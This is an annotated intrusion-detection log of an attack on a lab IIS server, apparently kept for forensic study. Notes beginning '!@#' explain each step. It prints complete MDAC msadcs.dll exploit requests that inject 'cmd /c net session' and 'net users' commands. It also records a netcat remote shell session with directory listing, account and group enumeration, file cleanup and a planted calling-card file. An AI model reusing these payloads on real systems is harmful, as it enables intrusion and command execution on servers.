multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.y.a.y.2...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulenerability to run 'net session' command and redirect output to file 'c:\yay2.txt'.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:55.733919 213.116.251.162:1924 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12474 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0xA2F0BD5C Ack: 0x2CC3551E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.c.:.\.y.a.y.2...t.x.t.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.427873 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29050 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEDC8C Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.996784 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29306 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEDD54 Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:46a
38 yay2.txt.. 14 File(s) 78,643,560
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to read file 'c:\yay2.txt'. Nobody is connected.
[**] netcat session 6969 [**]
02/04-05:48:59.035475 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31354 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x2CBEE01B Ack: 0x9E43FC55 Win: 0x20FC TcpLen: 20
type yay2.txt..There are no entries in the list........C:\>..C:\
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to clean up file 'c:\yay2.txt' (but not c:\Program Files\Common Files\system\msadc\yay2.txt)
[**] netcat session 6969 [**]
02/04-05:49:07.447963 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33658 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2CBEE05C Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
del yay2.txt....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:07.919822 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33914 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEE072 Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.057447 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37242 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBEE076 Ack: 0x9E43FC7B Win: 0x20D6 TcpLen: 20
net session >>yay3.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries 'net session' command again from remote shell but still doesn't have required priviledges
[**] netcat session 6969 [**]
02/04-05:49:14.394221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37498 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEE08E Ack: 0x9E43FC7D Win: 0x20D4 TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.758914 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37754 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE0D1 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:15.318578 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38010 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEE199 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,643,522
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.271333 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40314 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBEE460 Ack: 0x9E43FC8E Win: 0x20C3 TcpLen: 20
del yay&.*..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.599220 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40570 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBEE46C Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
Could Not Find C:\yay..The name specified is not recognized as a
n..internal or external command, operable program or batch file.
....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:22.144461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40826 IpLen:20 DgmLen:951 DF
***AP*** Seq: 0x2CBEE4FA Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..11/26/00 12:34p 0 CONFIG.SYS..12/26
/00 07:36p exploits..12/07/00 03:30p
InetPub..12/07/00 03:12p
Multimedia Files..12/26/00 07:10p New
Folder..01/26/01 02:10p 78,643,200 pagefile.sys..12/
21/00 08:59p Program Files..12/21/00 08:
59p TEMP..02/04/01 06:46a
WINNT..12/26/00 07:09p wiretrip..0
2/04/01 06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,
643,522 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries cleaning up a bit by running 'del yay.*'
!@# This deletes yay3.txt but looks like yay.txt is locked by another process.
[**] netcat session 6969 [**]
02/04-05:49:28.278508 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42618 IpLen:20 DgmLen:156 DF
***AP*** Seq: 0x2CBEE889 Ack: 0x9E43FC9B Win: 0x20B6 TcpLen: 20
del yay*..C:\yay.txt..The process cannot access the file because
..it is being used by another process.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:37.541896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45178 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2CBEE8FD Ack: 0x9E43FCA9 Win: 0x20A8 TcpLen: 20
del yay3.txt..Could Not Find C:\yay3.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.444008 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45946 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE933 Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.944406 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46202 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEE9FB Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerabiliy to run 'net users' and append output to file 'heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:49:54.324722 213.116.251.162:1930 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12612 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0xA4B7CF0B Ack: 0x2CC52434 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerabiliy to run 'net users' and append output to file 'c:\heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:50:00.058360 213.116.251.162:1932 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12622 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA4CF1F07 Ack: 0x2CC53AC7 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.c.:.\.h.e.h...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:03.550356 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51322 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEEC91 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:04.096869 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51578 IpLen:20 DgmLen:750 DF
***AP*** Seq: 0x2CBEED59 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:48a
263 heh.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a WINNT..12/26/00
07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,785 b
ytes.. 1,690,861,056 bytes free....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:08.257201 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53626 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBEF01F Ack: 0x9E43FCC2 Win: 0x208F TcpLen: 20
yuper .......The name specified is not recognized as an..interna
l or external command, operable program or batch file.....C:\>..
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Reads heh.txt from remote shell
[**] netcat session 6969 [**]
02/04-05:50:10.660668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54906 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF0A3 Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
type heh.txt....User accounts for \\.....-----------------------
--------------------------------------------------------..Admini
strator Guest IUSR_KENNY
..I
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:11.200217 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55162 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBEF16B Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
WAM_KENNY ..The command completed with one or more
errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Cleans up 'c:\heh.txt' using remote shell
[**] netcat session 6969 [**]
02/04-05:50:15.267294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56698 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBEF1C4 Ack: 0x9E43FCDB Win: 0x2076 TcpLen: 20
del heh.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:20.575002 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59002 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBEF1DD Ack: 0x9E43FCF0 Win: 0x2061 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks out contents of 'c:\program files\'
[**] netcat session 6969 [**]
02/04-05:50:20.975829 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59258 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF215 Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:21.520033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59514 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBEF2DD Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:26.583740 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60282 IpLen:20 DgmLen:59 DF
***AP*** Seq: 0x2CBEF53A Ack: 0x9E43FCFA Win: 0x2057 TcpLen: 20
cd ......C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:26.935985 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:60538 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF54D Ack: 0x9E43FCFE Win: 0x2053 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:27.421662 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:61050 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEF615 Ack: 0x9E43FCFE Win: 0x2053 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Leaves a calling card. writes 'Hi, i know that this a is a lab server, but patch the holes! :-)' to file README.NOW.Hax0r
[**] netcat session 6969 [**]
02/04-05:50:51.320224 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:6523 IpLen:20 DgmLen:144 DF
***AP*** Seq: 0x2CBEF8AB Ack: 0x9E43FD5A Win: 0x1FF7 TcpLen: 20
echo Hi, i know that this a ..is a lab server, but patch the hol
es! :-) >>README.NOW.Hax0r....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:54.024371 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7035 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF913 Ack: 0x9E43FD5F Win: 0x1FF2 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:54.547456 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:7291 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBEF9DB Ack: 0x9E43FD5F Win: 0x1FF2 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:48a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:06.442491 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8571 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEFCAA Ack: 0x9E43FD64 Win: 0x1FED TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:06.972588 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:8827 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x2CBEFD72 Ack: 0x9E43FD64 Win: 0x1FED TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..02/04/01 06:49a
69 README.NOW.Hax0r..12/21/00 08:59p TEMP..02/04/01 06:48a WINNT..1
2/26/00 07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,
643,591 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:31.180464 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:10875 IpLen:20 DgmLen:51 DF
***AP*** Seq: 0x2CBF0041 Ack: 0x9E43FD6F Win: 0x1FE2 TcpLen: 20
net group..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Runs 'net groups' command from remote shell. This shows the domain groups.
[**] netcat session 6969 [**]
02/04-05:51:31.598565 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:11131 IpLen:20 DgmLen:292 DF
***AP*** Seq: 0x2CBF004C Ack: 0x9E43FD6F Win: 0x1FE2 TcpLen: 20
..Group Accounts for \\.....------------------------------------
-------------------------------------------..*Domain Admins
*Domain Guests *Domain Users ..The
command completed with one or more errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:51:35.484703 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:12923 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBF0148 Ack: 0x9E43FD7F Win: 0x1FD2 TcpLen: 20
net localgroup..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries to run 'net localgroup' from remote shell. This fails
[**] netcat session 6969 [**]
02/04-05:51:35.924989 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:13179 IpLen:20 DgmLen:176 DF
